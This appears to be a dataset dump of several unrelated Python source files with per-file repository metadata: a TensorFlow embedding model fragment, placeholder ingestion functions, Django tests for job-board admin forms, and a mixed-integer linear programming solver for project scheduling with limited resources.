self.activations.append(self.motifinputs)
for i in range(0, len(FLAGS.motif_embedding_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
# Motif layers sit after the property layers in self.layers.
layer = self.layers[i + len(FLAGS.property_embedding_hidden)]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
motif_embedding = self.activations[-1]
# print("   motif_embedding shape: {}".format(motif_embedding.get_shape()))
# 3. embedding polymerization
if FLAGS.embeding_combination_method == "Hadamard":
combination = tf.multiply(property_embedding, motif_embedding)
self.activations.append(combination)
elif FLAGS.embeding_combination_method == "Summation":
combination = tf.add(property_embedding, motif_embedding)
self.activations.append(combination)
elif FLAGS.embeding_combination_method == "Connection":
combination = tf.concat([property_embedding, motif_embedding], 1)
self.activations.append(combination)
else:
raise Exception("[ERROR] the embeding_combination_method not exist.")
# print("   combination shape: {}".format(combination.get_shape()))
# 4. Integration layer
for i in range(0, len(FLAGS.integration_hidden)):
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[i + len(FLAGS.property_embedding_hidden) + len(FLAGS.motif_embedding_hidden)]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
# 5. Output layer
# print(">> Input shape: {}".format(self.activations[-1].get_shape()))
layer = self.layers[-1]
hidden = layer(self.activations[-1])
self.activations.append(hidden)
self.outputs = self.activations[-1]
# Store model variables for easy access
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
self.vars = {var.name: var for var in variables}
# Build metrics
self._loss()
self._accuracy()
self.opt_op = self.optimizer.minimize(self.loss)
def predict(self):
return tf.nn.softmax(self.outputs)
#######################################################
| 44.072973
| 155
| 0.523211
| 1,561
| 16,307
| 5.288277
| 0.106983
| 0.058147
| 0.039007
| 0.044094
| 0.816233
| 0.781224
| 0.754815
| 0.717626
| 0.711811
| 0.668928
| 0
| 0.005902
| 0.366162
| 16,307
| 370
| 156
| 44.072973
| 0.792763
| 0.14877
| 0
| 0.708661
| 0
| 0
| 0.034578
| 0.001961
| 0
| 0
| 0
| 0
| 0.003937
| 1
| 0.094488
| false
| 0.003937
| 0.007874
| 0.011811
| 0.129921
| 0.007874
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
347522f1c3db216d74d5b2fab7480a079fc88fce
| 265
|
py
|
Python
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 7
|
2018-04-15T17:42:13.000Z
|
2020-12-09T23:03:32.000Z
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 16
|
2018-03-31T17:34:17.000Z
|
2018-04-12T04:28:50.000Z
|
realDataAcquisition/python/csvIngestor.py
|
samkreter/DataScienceMicroServices
|
b9835380ff3a76688bbb803371169b2fa4c632f9
|
[
"MIT"
] | 2
|
2018-04-17T19:52:33.000Z
|
2018-04-17T19:52:56.000Z
|
import requests
import json
import logging
import pandas as pd
#Get data ingestions
def getZipFiles():
    """Placeholder for fetching the raw zip files for ingestion.

    Not yet implemented: logs a critical message and returns None.
    """
    # Fix: message was misspelled "Not Implememented", inconsistent with
    # the sibling placeholders unZipFiles()/cleanData().
    logging.critical("Not Implemented")
def unZipFiles():
    """Placeholder for extracting the downloaded zip archives."""
    message = "Not Implemented"
    logging.critical(message)
def cleanData():
    """Placeholder for cleaning the ingested data."""
    message = "Not Implemented"
    logging.critical(message)
| 15.588235
| 41
| 0.74717
| 31
| 265
| 6.387097
| 0.580645
| 0.227273
| 0.272727
| 0.292929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158491
| 265
| 16
| 42
| 16.5625
| 0.887892
| 0.071698
| 0
| 0.2
| 0
| 0
| 0.193416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| true
| 0
| 0.4
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cad6846735830cbb526c2aae2a6a9a95c2578ff9
| 8,330
|
py
|
Python
|
aldryn_jobs/tests/test_forms.py
|
what-digital/aldryn-jobs
|
7704b475f691d609fdd65a2aa1925c488d273e59
|
[
"BSD-3-Clause"
] | 1
|
2021-04-29T09:42:01.000Z
|
2021-04-29T09:42:01.000Z
|
aldryn_jobs/tests/test_forms.py
|
what-digital/aldryn-jobs
|
7704b475f691d609fdd65a2aa1925c488d273e59
|
[
"BSD-3-Clause"
] | 2
|
2019-02-27T11:20:16.000Z
|
2019-02-27T11:21:36.000Z
|
aldryn_jobs/tests/test_forms.py
|
SocialSchools/socialschools-jobs
|
8e79e0a792c8fdd85c6860f89dbbd47c6ca8b7ce
|
[
"BSD-3-Clause"
] | 2
|
2020-03-30T09:26:19.000Z
|
2020-03-30T10:48:36.000Z
|
from ..models import JobCategory
from ..forms import JobCategoryAdminForm, JobOpeningAdminForm
from .base import JobsBaseTestCase
class JobCategoryAdminFormTestCase(JobsBaseTestCase):
"""Validation tests for JobCategoryAdminForm.

Invalid-input cases assert that missing required fields ('app_config',
'name') produce form errors rather than a server error; valid-input
cases assert the saved category carries the submitted name/slug and
the expected app_config. Uniqueness is scoped per app_config.
"""
def test_form_not_valid_if_app_config_not_selected(self):
# and it produces validation error instead of 500
data = {
'name': self.default_category_values['en']['name'],
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('app_config', form.errors.keys())
def test_form_not_valid_no_data_provided_at_all(self):
# and it produces validation error instead of 500
data = {}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
# Both required fields must be reported at once.
self.assertIn('app_config', form.errors.keys())
self.assertIn('name', form.errors.keys())
def test_form_not_valid_if_only_app_config_was_selected(self):
# and it produces validation error instead of 500
data = {'app_config': self.app_config.pk}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('name', form.errors.keys())
def test_form_not_valid_if_only_name_was_provided(self):
# and it produces validation error instead of 500
data = {'name': self.default_category_values['en']['name']}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('app_config', form.errors.keys())
def test_form_not_valid_if_only_slug_was_provided(self):
# and it produces validation error instead of 500
data = {
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('name', form.errors.keys())
self.assertIn('app_config', form.errors.keys())
def test_form_valid_for_same_name_in_different_app_config(self):
# A name duplicating the default category is fine under another config.
other_config = self.create_config(namespace='other_config')
data = {
'app_config': other_config.pk,
'name': self.default_category_values['en']['name'],
'slug': 'default-category-different-slug',
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertEqual(new_category.slug,
data['slug'])
self.assertEqual(new_category.app_config, other_config)
def test_form_valid_for_same_slug_in_different_app_config(self):
# depends on decision if we will remove uniqueness of slug per language
other_config = self.create_config(namespace='other_config')
data = {
'name': 'different name',
'slug': self.default_category_values['en']['slug'],
'app_config': other_config.pk,
}
# NOTE(review): this update overwrites 'name'/'slug' above with the
# default values — presumably intentional; confirm against base case.
data.update(self.default_category_values['en'])
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertEqual(new_category.slug,
data['slug'])
self.assertEqual(new_category.app_config, other_config)
def test_form_is_valid_for_unique_name(self):
# form should allow unique names
data = {
'name': 'Unique name for category',
'app_config': self.app_config.pk
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
# Slug was not submitted, so it must have been auto-generated.
self.assertGreater(len(new_category.slug), 0)
self.assertEqual(new_category.app_config, self.app_config)
def test_form_is_valid_for_unique_slug(self):
# form should allow unique names
data = {
'name': 'Unique name for category with slug',
'slug': 'unique-name-for-category-with-slug',
'app_config': self.app_config.pk
}
form = JobCategoryAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_category = form.save()
self.assertEqual(new_category.name,
data['name'])
self.assertGreater(len(new_category.slug), 0)
self.assertEqual(new_category.app_config, self.app_config)
class JobOpeningAdminFormTestCase(JobsBaseTestCase):
"""Validation tests for JobOpeningAdminForm.

Mirrors the category form tests: a missing 'category' yields a form
error (not a 500); duplicate titles/slugs are allowed when the
opening belongs to a category under a different app_config.
"""
def test_form_not_valid_if_category_not_selected(self):
# and it produces validation error instead of 500
self.create_default_job_opening(translated=True)
# provide same data as for default opening
data = {
'title': self.default_job_values['en']['title'],
'slug': self.default_job_values['en']['slug'],
}
form = JobOpeningAdminForm(data)
self.assertFalse(form.is_valid())
self.assertIn('category', form.errors.keys())
def test_form_valid_for_same_name_in_different_category_app_config(self):
self.create_default_job_opening(translated=True)
# prepare category with other app config
other_config = self.create_config(namespace='other_config')
other_category = JobCategory.objects.create(
name='Other category', app_config=other_config)
data = {
'category': other_category.pk,
'title': self.default_job_values['en']['title'],
'slug': 'default-category-different-slug',
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertEqual(new_opening.slug,
data['slug'])
self.assertEqual(new_opening.category, other_category)
def test_form_valid_for_same_slug_in_different_category(self):
self.create_default_job_opening(translated=True)
# depends on decision if we will remove uniqueness of slug per language
other_config = self.create_config(namespace='other_config')
other_category = JobCategory.objects.create(
name='Other category', app_config=other_config)
data = {
'title': 'different title',
'slug': self.default_job_values['en']['slug'],
'category': other_category.pk,
}
# NOTE(review): this update overwrites 'title'/'slug' above with the
# default values — presumably intentional; confirm against base case.
data.update(self.default_job_values['en'])
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertEqual(new_opening.slug,
data['slug'])
self.assertEqual(new_opening.category, other_category)
def test_form_is_valid_for_unique_name(self):
# form should allow unique names
data = {
'title': 'Unique title for opening',
'category': self.default_category.pk
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
# Slug was not submitted, so it must have been auto-generated.
self.assertGreater(len(new_opening.slug), 0)
self.assertEqual(new_opening.category, self.default_category)
def test_form_is_valid_for_unique_slug(self):
# form should allow unique names
data = {
'title': 'Unique title for opening with slug',
'slug': 'unique-title-for-opening-with-slug',
'category': self.default_category.pk
}
form = JobOpeningAdminForm(data)
self.assertTrue(form.is_valid())
# test new category values
new_opening = form.save()
self.assertEqual(new_opening.title,
data['title'])
self.assertGreater(len(new_opening.slug), 0)
self.assertEqual(new_opening.category, self.default_category)
| 40.241546
| 79
| 0.632173
| 941
| 8,330
| 5.350691
| 0.092455
| 0.046475
| 0.0715
| 0.051639
| 0.915194
| 0.877259
| 0.857001
| 0.834161
| 0.767031
| 0.745382
| 0
| 0.003596
| 0.265546
| 8,330
| 206
| 80
| 40.436893
| 0.819385
| 0.093758
| 0
| 0.75
| 0
| 0
| 0.099097
| 0.025505
| 0
| 0
| 0
| 0
| 0.280488
| 1
| 0.085366
| false
| 0
| 0.018293
| 0
| 0.115854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
caf2946c845d0328c9fc0a2a2c9338921e0038d8
| 35,225
|
py
|
Python
|
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
skdecide/builders/discrete_optimization/rcpsp/solver/rcpsp_lp_solver.py
|
galleon/bug-free-invention
|
37bcea112da39d1390ff2b30951b36ee5dbc0e6d
|
[
"MIT"
] | null | null | null |
from itertools import product
from typing import List, Dict, Union
from mip import Model, xsum, BINARY, MINIMIZE, CBC, GRB, Var, INTEGER
from skdecide.builders.discrete_optimization.generic_tools.do_problem import build_evaluate_function_aggregated, ParamsObjectiveFunction, \
ModeOptim, get_default_objective_setup, build_aggreg_function_and_params_objective
from skdecide.builders.discrete_optimization.generic_tools.lp_tools import MilpSolver
from skdecide.builders.discrete_optimization.generic_tools.lp_tools import ParametersMilp
from skdecide.builders.discrete_optimization.generic_tools.mip.pymip_tools import MyModelMilp
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage
from skdecide.builders.discrete_optimization.rcpsp.rcpsp_model import RCPSPSolution, SingleModeRCPSPModel,\
MultiModeRCPSPModel, RCPSPModelCalendar, PartialSolution
from skdecide.builders.discrete_optimization.rcpsp.solver.rcpsp_pile import PileSolverRCPSP, GreedyChoice, PileSolverRCPSP_Calendar
from enum import Enum
import random
import gurobi
class LP_RCPSP_Solver(Enum):
    """MILP backends selectable for the RCPSP LP solver."""
    GRB = 0  # Gurobi
    CBC = 1  # COIN-OR CBC
class LP_RCPSP(MilpSolver):
    """Time-indexed MILP formulation of the single-mode RCPSP (python-mip).

    Binary variable x[j][t] equals 1 iff task j starts at time t; the
    objective minimizes the start time of the last (sink) task.
    """

    def __init__(self, rcpsp_model: SingleModeRCPSPModel,
                 lp_solver=LP_RCPSP_Solver.CBC,
                 params_objective_function: ParamsObjectiveFunction = None, **kwargs):
        """
        :param rcpsp_model: single-mode RCPSP instance to solve.
        :param lp_solver: MILP backend selector (CBC by default).
        :param params_objective_function: objective aggregation setup;
            a default one is built when None.
        """
        self.rcpsp_model = rcpsp_model
        self.model: Model = None
        # Map the enum selector onto the python-mip backend constant.
        self.lp_solver = CBC
        if lp_solver == LP_RCPSP_Solver.GRB:
            self.lp_solver = GRB
        elif lp_solver == LP_RCPSP_Solver.CBC:
            self.lp_solver = CBC
        self.variable_decision = {}
        self.constraints_dict = {"lns": []}
        self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
            build_aggreg_function_and_params_objective(
                problem=self.rcpsp_model,
                params_objective_function=params_objective_function)

    def init_model(self, **args):
        """Build the time-indexed MILP model.

        Keyword args:
            greedy_start (bool): warm-start from a greedy pile solution (default True).
            start_solution (RCPSPSolution): user-supplied warm-start schedule.
            verbose (bool): print progress/debug information (default False).
            partial_solution (PartialSolution): optional constraints fixing
                parts of the schedule.
        """
        greedy_start = args.get("greedy_start", True)
        start_solution = args.get("start_solution", None)
        verbose = args.get("verbose", False)
        # Obtain an initial feasible schedule: it provides both a warm start
        # and an upper bound on the makespan, which bounds the time horizon.
        if start_solution is None:
            if greedy_start:
                if verbose:
                    print("Computing greedy solution")
                greedy_solver = PileSolverRCPSP(self.rcpsp_model)
                store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
                self.start_solution = store_solution.get_best_solution_fit()[0]
                makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
            else:
                if verbose:
                    print("Get dummy solution")
                solution = self.rcpsp_model.get_dummy_solution()
                self.start_solution = solution
                makespan = self.rcpsp_model.evaluate(solution)["makespan"]
        else:
            self.start_solution = start_solution
            makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        if verbose:
            print(sorted_tasks)
        # p[j]: duration of task j (single-mode model -> mode 1).
        p = [int(self.rcpsp_model.mode_details[key][1]['duration'])
             for key in sorted_tasks]
        # u[j][r]: consumption of resource r by task j.
        u = []
        for task in sorted_tasks:
            tmp = []
            for r in self.rcpsp_model.resources.keys():
                tmp.append(self.rcpsp_model.mode_details[task][1][r])
            u.append(tmp)
        # c[r]: capacity of resource r.
        c = [x for x in self.rcpsp_model.resources.values()]
        # S: precedence pairs [predecessor, successor], converted to 0-based
        # indices (tasks are 1-based in the model data).
        S = []
        if verbose:
            print('successors: ', self.rcpsp_model.successors)
        for task in sorted_tasks:
            for suc in self.rcpsp_model.successors[task]:
                S.append([task - 1, suc - 1])
        (R, self.J, self.T) = (range(len(c)), range(len(p)), range(sum(p)))
        # The warm-start makespan gives a much tighter horizon than sum(p).
        self.T = range(int(makespan + 1))
        self.model = Model(sense=MINIMIZE,
                           solver_name=self.lp_solver)
        self.x: List[List[Var]] = [[self.model.add_var(name="x({},{})".format(j, t),
                                                       var_type=BINARY) for t in self.T]
                                   for j in self.J]
        # Minimize the start time of the sink task.
        self.model.objective = xsum(self.x[len(self.J) - 1][t] * t for t in self.T)
        # Each task starts exactly once.
        for j in self.J:
            self.model += xsum(self.x[j][t] for t in self.T) == 1
        # Resource-capacity constraint at every time step.
        for (r, t) in product(R, self.T):
            self.model += (
                xsum(u[j][r] * self.x[j][t2] for j in self.J for t2 in range(max(0, t - p[j] + 1), t + 1))
                <= c[r])
        # Precedence: successor starts at least p[j] after predecessor start.
        for (j, s) in S:
            self.model += xsum(t * self.x[s][t] - t * self.x[j][t] for t in self.T) >= p[j]
        # Warm start: set every x[j][t] to match the initial schedule.
        start = []
        for j in self.J:
            for t in self.T:
                if self.start_solution.rcpsp_schedule[j + 1]["start_time"] == t:
                    start += [(self.x[j][t], 1)]
                else:
                    start += [(self.x[j][t], 0)]
        self.model.start = start
        # Optional partial-solution constraints.
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        self.constraints_partial_solutions = []
        if p_s is not None:
            constraints = []
            if p_s.start_times is not None:
                for task in p_s.start_times:
                    constraints += [self.model.add_constr(xsum([j * self.x[task - 1][j]
                                                                for j in range(len(self.x[task - 1]))]) == p_s.start_times[task])]
                    constraints += [self.model.add_constr(self.x[task - 1][p_s.start_times[task]] == 1)]
            if p_s.partial_permutation is not None:
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    constraints += [self.model.add_constr(xsum([t * self.x[t1 - 1][t] - t * self.x[t2 - 1][t]
                                                                for t in self.T]) <= 0)]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        constraints += [self.model.add_constr(xsum([t * self.x[t1 - 1][t] - t * self.x[t2 - 1][t]
                                                                    for t in self.T]) <= 0)]
            # Auxiliary integer start-time variables used by the pairwise
            # timing constraints below.
            # NOTE(review): self.starts only exists when a partial solution is
            # given — confirm no external code reads it unconditionally.
            self.starts = {}
            for j in range(len(self.x)):
                self.starts[j] = self.model.add_var(name="start_" + str(j),
                                                    lb=0, ub=makespan)
                self.model.add_constr(xsum(t * self.x[j][t] for t in self.T) == self.starts[j])
            if p_s.start_at_end is not None:
                for i, j in p_s.start_at_end:
                    constraints += [self.model.add_constr(self.starts[j - 1] == self.starts[i - 1] + p[i - 1])]
            if p_s.start_together is not None:
                for i, j in p_s.start_together:
                    constraints += [self.model.add_constr(self.starts[j - 1] == self.starts[i - 1])]
            if p_s.start_after_nunit is not None:
                for t1, t2, delta in p_s.start_after_nunit:
                    constraints += [self.model.add_constr(self.starts[t2 - 1] >= self.starts[t1 - 1] + delta)]
            if p_s.start_at_end_plus_offset is not None:
                for t1, t2, delta in p_s.start_at_end_plus_offset:
                    constraints += [self.model.add_constr(self.starts[t2 - 1] >= self.starts[t1 - 1] + delta + p[t1 - 1])]
            self.constraints_partial_solutions = constraints

    def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
        """Extract the solver's solution pool into a ResultStorage.

        :param parameters_milp: controls how many pool solutions are read.
        :return: ResultStorage holding (solution, fitness) pairs.
        """
        retrieve_all_solution = parameters_milp.retrieve_all_solution
        nb_solutions_max = parameters_milp.n_solutions_max
        nb_solution = min(nb_solutions_max, self.model.num_solutions)
        if not retrieve_all_solution:
            nb_solution = 1
        list_solution_fits = []
        print(nb_solution, " solutions found")
        for s in range(nb_solution):
            rcpsp_schedule = {}
            for (j, t) in product(self.J, self.T):
                value = self.x[j][t].xi(s)
                if value >= 0.5:
                    rcpsp_schedule[j + 1] = {'start_time': t,
                                             'end_time': t + self.rcpsp_model.mode_details[j + 1][1]['duration']}
            print("Size schedule : ", len(rcpsp_schedule.keys()))
            try:
                solution = RCPSPSolution(problem=self.rcpsp_model,
                                         rcpsp_schedule=rcpsp_schedule,
                                         rcpsp_schedule_feasible=True)
                fit = self.aggreg_from_sol(solution)
                list_solution_fits += [(solution, fit)]
            except Exception as e:
                # Best-effort: skip malformed pool entries, but surface the
                # failure instead of a silent bare `except`.
                print("Problem =", rcpsp_schedule, len(rcpsp_schedule), e)
        return ResultStorage(list_solution_fits=list_solution_fits,
                             best_solution=min(list_solution_fits,
                                               key=lambda x: x[1])[0],
                             mode_optim=self.params_objective_function.sense_function)

    def solve(self, parameters_milp: ParametersMilp = None, **kwargs) -> ResultStorage:
        """Optimize the model (building it first if necessary).

        :param parameters_milp: MILP parameters; ParametersMilp.default() is
            used when None (avoids evaluating the default at def time).
        """
        if parameters_milp is None:
            parameters_milp = ParametersMilp.default()
        if self.model is None:
            self.init_model()
        limit_time_s = parameters_milp.TimeLimit
        self.model.sol_pool_size = parameters_milp.PoolSolutions
        self.model.max_mip_gap_abs = parameters_milp.MIPGapAbs
        self.model.max_mip_gap = parameters_milp.MIPGap
        self.model.optimize(max_seconds=limit_time_s,
                            max_solutions=parameters_milp.n_solutions_max)
        return self.retrieve_solutions(parameters_milp)
class LP_MRCPSP(MilpSolver):
    """Time-indexed MILP formulation of the multi-mode RCPSP (python-mip).

    Binary variable x[(task, mode, t)] equals 1 iff `task` starts at time t
    executed in `mode`; the objective minimizes the sink task's start time.
    """

    def __init__(self,
                 rcpsp_model: MultiModeRCPSPModel,
                 lp_solver=LP_RCPSP_Solver.CBC,
                 params_objective_function: ParamsObjectiveFunction = None, **kwargs):
        """
        :param rcpsp_model: multi-mode RCPSP instance to solve.
        :param lp_solver: MILP backend selector (CBC by default).
        :param params_objective_function: objective aggregation setup;
            a default one is built when None.
        """
        self.rcpsp_model = rcpsp_model
        self.model: Model = None
        # Map the enum selector onto the python-mip backend constant.
        self.lp_solver = CBC
        if lp_solver == LP_RCPSP_Solver.GRB:
            self.lp_solver = GRB
        elif lp_solver == LP_RCPSP_Solver.CBC:
            self.lp_solver = CBC
        self.variable_decision = {}
        self.constraints_dict = {"lns": []}
        self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
            build_aggreg_function_and_params_objective(
                problem=self.rcpsp_model,
                params_objective_function=params_objective_function)

    def init_model(self, **args):
        """Build the time-indexed multi-mode MILP model.

        Keyword args:
            greedy_start (bool): warm-start from a greedy pile solution (default True).
            start_solution (RCPSPSolution): user-supplied warm-start schedule.
            verbose (bool): print progress/debug information (default False).
            partial_solution (PartialSolution): optional constraints fixing
                parts of the schedule.
        """
        greedy_start = args.get("greedy_start", True)
        start_solution = args.get("start_solution", None)
        verbose = args.get("verbose", False)
        # Obtain an initial feasible schedule: warm start + horizon bound.
        if start_solution is None:
            if greedy_start:
                if verbose:
                    print("Computing greedy solution")
                greedy_solver = PileSolverRCPSP(self.rcpsp_model)
                store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
                self.start_solution = store_solution.get_best_solution_fit()[0]
                makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
            else:
                if verbose:
                    print("Get dummy solution")
                solution = self.rcpsp_model.get_dummy_solution()
                self.start_solution = solution
                makespan = self.rcpsp_model.evaluate(solution)["makespan"]
        else:
            self.start_solution = start_solution
            makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        # p[j]: worst-case (max over modes) duration of task j, used only to
        # size the default horizon.
        p = [int(max([self.rcpsp_model.mode_details[key][mode]['duration']
                      for mode in self.rcpsp_model.mode_details[key]]))
             for key in sorted_tasks]
        c = [x for x in self.rcpsp_model.resources.values()]
        # Split capacities into renewable / non-renewable resources.
        renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.resources
                     if r not in self.rcpsp_model.non_renewable_resources}
        non_renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.non_renewable_resources}
        # S: precedence pairs [predecessor, successor] (task ids, 1-based).
        S = []
        if verbose:
            print('successors: ', self.rcpsp_model.successors)
        for task in sorted_tasks:
            for suc in self.rcpsp_model.successors[task]:
                S.append([task, suc])
        (R, self.J, self.T) = (range(len(c)), range(len(p)), range(sum(p)))
        # Tighten the horizon with the warm-start makespan when feasible.
        if self.start_solution.rcpsp_schedule_feasible:
            self.T = range(int(makespan + 1))
        self.model = Model(sense=MINIMIZE,
                           solver_name=self.lp_solver)
        # Fix: `Dict[Var]` (single type parameter) raises TypeError when the
        # annotation is evaluated at runtime; keys are (task, mode, t) tuples.
        self.x: Dict[Tuple[int, int, int], Var] = {}
        last_task = max(self.rcpsp_model.mode_details.keys())
        variable_per_task = {}
        for task in sorted_tasks:
            if task not in variable_per_task:
                variable_per_task[task] = []
            for mode in self.rcpsp_model.mode_details[task]:
                for t in self.T:
                    self.x[(task, mode, t)] = self.model.add_var(name="x({},{}, {})".format(task, mode, t),
                                                                 var_type=BINARY)
                    variable_per_task[task] += [(task, mode, t)]
        # Minimize the start time of the sink task (key[2] is t).
        self.model.objective = xsum(self.x[key] * key[2] for key in variable_per_task[last_task])
        # Each task starts exactly once, in exactly one mode.
        for j in variable_per_task:
            self.model += xsum(self.x[key] for key in variable_per_task[j]) == 1
        # Calendar models already give per-time-step availability; otherwise
        # replicate the constant capacity over the horizon.
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            renewable_quantity = {r: renewable[r] for r in renewable}
        else:
            renewable_quantity = {r: [renewable[r]] * len(self.T) for r in renewable}
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            non_renewable_quantity = {r: non_renewable[r] for r in non_renewable}
        else:
            non_renewable_quantity = {r: [non_renewable[r]] * len(self.T) for r in non_renewable}
        # Renewable capacity at every time step: a task occupies resource r
        # from its start key[2] for its mode's duration.
        for (r, t) in product(renewable, self.T):
            self.model.add_constr(xsum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
                                       for key in self.x
                                       if key[2] <= t < key[2] + int(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"]))
                                  <= renewable_quantity[r][t])
            if verbose:
                print(r, t)
        # Non-renewable resources are consumed globally, once per task.
        for r in non_renewable:
            self.model.add_constr(xsum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
                                       for key in self.x) <= non_renewable_quantity[r][0])
        # durations[j]: mode-dependent effective duration of task j.
        durations = {j: self.model.add_var(name="duration_" + str(j),
                                           var_type=INTEGER)
                     for j in variable_per_task}
        self.durations = durations
        self.variable_per_task = variable_per_task
        for j in variable_per_task:
            self.model.add_constr(xsum(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"] * self.x[key]
                                       for key in variable_per_task[j]) == durations[j])
        # Precedence: start(s) - start(j) >= duration(j).
        for (j, s) in S:
            self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[s]]
                                       + [- key[2] * self.x[key]
                                          for key in variable_per_task[j]]) >=
                                  durations[j])
        # Warm start from the initial schedule (source/sink tasks only have
        # mode 1; others read their mode from the warm-start solution).
        start = []
        for j in self.start_solution.rcpsp_schedule:
            start_time_j = self.start_solution.rcpsp_schedule[j]["start_time"]
            mode_j = 1 if j == 1 or j == self.rcpsp_model.n_jobs + 2 else self.start_solution.rcpsp_modes[j - 2]
            start += [(self.durations[j], self.rcpsp_model.mode_details[j][mode_j]["duration"])]
            for k in self.variable_per_task[j]:
                task, mode, time = k
                if start_time_j == time and mode == mode_j:
                    start += [(self.x[k], 1)]
                else:
                    start += [(self.x[k], 0)]
        self.model.start = start
        # Optional partial-solution constraints.
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        self.constraints_partial_solutions = []
        if p_s is not None:
            constraints = []
            if p_s.start_times is not None:
                for task in p_s.start_times:
                    constraints += [self.model.add_constr(xsum([self.x[k] for k in self.variable_per_task[task]
                                                                if k[2] == p_s.start_times[task]]) == 1)]
            if p_s.partial_permutation is not None:
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    constraints += [self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[t1]]
                                                               + [- key[2] * self.x[key]
                                                                  for key in variable_per_task[t2]]) <= 0)]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        constraints += [self.model.add_constr(xsum([key[2] * self.x[key] for key in variable_per_task[t1]]
                                                                   + [- key[2] * self.x[key]
                                                                      for key in variable_per_task[t2]]) <= 0)]
            self.constraints_partial_solutions = constraints
            if verbose:
                print('Partial solution constraints : ', self.constraints_partial_solutions)

